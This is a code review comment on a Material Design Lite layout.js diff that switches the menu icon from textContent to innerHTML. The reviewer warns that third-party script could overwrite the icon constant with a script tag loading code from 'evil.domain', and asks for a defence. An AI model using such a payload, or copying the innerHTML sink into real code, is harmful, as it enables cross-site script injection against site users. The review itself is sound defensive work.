src/layout/layout.js

```diff
@@ -303,7 +303,7 @@
 
           var drawerButtonIcon = document.createElement('i');
           drawerButtonIcon.classList.add(this.CssClasses_.ICON);
-          drawerButtonIcon.textContent = this.Constant_.MENU_ICON;
+          drawerButtonIcon.innerHTML = this.Constant_.MENU_ICON;
```

Comment:
@surma Um, just thought of this...

Any actor in a page could overwrite the contents of `MaterialLayout.prototype.Constant_.MENU_ICON`. Which could then leave this open to injecting malicious code.

i.e.
```
<body>
// Page markup
// Developer loads MDL
// Developer loads third party JS which contains
<script>
  MaterialLayout.prototype.Constants_.MENU_ICON = '&#xE5D2 <script src="https://evil.domain/script.js"></script>';
</script>
</body>
```

That would then insert the script, load, and execute it if my thinking is correct.

Anything we can do to defend against this?